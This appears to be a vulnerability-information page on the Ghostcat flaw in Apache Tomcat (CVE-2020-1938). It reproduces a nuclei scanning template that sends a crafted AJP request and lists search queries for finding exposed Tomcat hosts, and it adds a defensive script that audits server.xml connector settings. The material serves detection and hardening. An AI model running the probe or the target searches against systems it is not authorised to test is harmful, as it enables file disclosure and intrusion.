Apache Tomcat AJP File Read/Inclusion Vulnerability

Vulnerability information

Vulnerability name: Apache Tomcat AJP File Read/Inclusion Vulnerability

Vulnerability IDs:

  • CVE: CVE-2020-1938

  • CNVD: CNVD-2020-10487

Vulnerability type: file read

Severity: critical

Vulnerability description: Apache Tomcat is a widely used open-source web server and Servlet container that supports the Java Servlet and JavaServer Pages (JSP) technologies and is commonly used for enterprise application deployment. Thanks to its performance and stability, Tomcat holds an important position in Internet services. This vulnerability, known as Ghostcat, affects Apache Tomcat's implementation of the AJP (Apache JServ Protocol) protocol. AJP is designed for communication between Tomcat and a front-end web server (such as Apache HTTP Server) to improve performance. However, because Tomcat enabled the AJP connector by default and trusts AJP connections more than HTTP connections, an attacker can exploit this vulnerability to read or include arbitrary files within the web application, and under certain conditions achieve remote code execution. The root cause is Tomcat's improper handling of AJP requests: it did not adequately validate and restrict the request content, so an attacker can craft requests that reach restricted resources. Exploitation requires no authentication; an attacker only needs network access to Tomcat's AJP port, which makes this a serious threat to affected systems. Successful exploitation can disclose sensitive information such as configuration files, source code, or credentials, and can ultimately lead to full system compromise.

Vendor: Apache

Product: Apache Tomcat

Affected versions: 9.0.0.M1 <= version <= 9.0.0.30, 8.5.0 <= version <= 8.5.50, 7.0.0 <= version <= 7.0.99

Search syntax: title="apache tomcat"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2020%2FCVE-2020-1938.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details


```yaml
id: CVE-2020-1938

info:
  name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability
  author: milo2012, NaN@korelogic
  severity: critical
  description: |
    When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed
    - returning arbitrary files from anywhere in the web application
    - processing any file in the web application as a JSP
    Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials.
  remediation: https://access.redhat.com/solutions/4851251
  reference:
    - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
    - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
    - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
    - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
    - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-1938
    cwe-id: CWE-269
    epss-score: 0.94469
    epss-percentile: 0.99995
    cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: apache
    product: geode
    shodan-query:
      - title:"Apache Tomcat"
      - http.title:"apache tomcat"
    fofa-query: title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"

    inputs:
      - data: "{{hex_decode('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')}}"
        read-size: 1024

    matchers:
      - type: word
        words:
          - "See the NOTICE file distributed with"
# digest: 4a0a0047304502205ae5556991b044128ba5f41d0fdf612bc9477bc4334c3be2b8c71b519a613fd2022100e11b38470d922b9810e9bc318e4d6ebe2fa33974b298365f110a02545d7e153b:922c64590222798bb761d5b6d8e72950
```
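The description above and the template's `info.description` both turn on the same two configuration facts: the pre-9.0.31 default AJP connector listened on every address, and nothing authenticated the AJP client. The following is an added example (written for this page; it is not part of the nuclei template or of the Tomcat project) that audits a `server.xml` for exactly those two weaknesses. It uses the real connector attributes `address`, `secret`, `secretRequired` and the older `requiredSecret`; the two `server.xml` samples are constructed here, and the hardened one places a placeholder where a real random secret would go.

```python
"""Audit a Tomcat server.xml for the AJP connector settings behind CVE-2020-1938.

Constructed example for this page; not part of nuclei-templates or Apache Tomcat.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the AJP connector as shipped before 9.0.31 / 8.5.51 / 7.0.100,
# with no address (listens on all interfaces) and no shared secret.
WEAK_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed sample: the hardened shape introduced with 9.0.31, bound to loopback and
# requiring a shared secret from the front-end web server. The secret value is a placeholder.
HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed sample: the connector is present but commented out, i.e. disabled.
DISABLED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
  </Service>
</Server>
"""

WILDCARD_ADDRESSES = {"0.0.0.0", "::", "::0"}


def _is_ajp(connector):
    # Tomcat accepts the short form "AJP/1.3" or a fully qualified org.apache.coyote.ajp.* class name.
    protocol = connector.get("protocol", "HTTP/1.1")
    return protocol.upper().startswith("AJP/") or "coyote.ajp" in protocol


def audit_ajp_connectors(server_xml):
    """Return one finding per weakness in each active AJP connector.

    Commented-out connectors are skipped automatically because ElementTree
    discards XML comments while parsing, which matches how Tomcat treats them.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        if not _is_ajp(conn):
            continue
        port = conn.get("port", "?")

        # Weakness 1: no address, or a wildcard address, exposes AJP on every interface.
        address = conn.get("address")
        if address is None or address in WILDCARD_ADDRESSES:
            findings.append(f'port {port}: AJP connector listens on all interfaces (bind with address="127.0.0.1")')

        # Weakness 2: no shared secret means any client reaching the port is trusted.
        # 'secret' is the current attribute name; 'requiredSecret' is the older one.
        secret = conn.get("secret") or conn.get("requiredSecret")
        secret_required = conn.get("secretRequired", "true").lower() != "false"
        if not secret and not secret_required:
            findings.append(f'port {port}: secretRequired="false" accepts unauthenticated AJP clients')
        elif not secret:
            findings.append(f"port {port}: no AJP secret configured (9.0.31+ refuses to start this connector; "
                            "older releases accept unauthenticated AJP)")
    return findings


if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML), ("disabled", DISABLED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml_text) or ["no findings"])
```

Run it against a real `server.xml` by passing the file contents to `audit_ajp_connectors`; an empty result means every AJP connector is either absent, commented out, or both bound to a non-wildcard address and protected by a secret.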


http://example.com/2025/07/06/github_610540356/
Author: lianccc
Published: July 6, 2025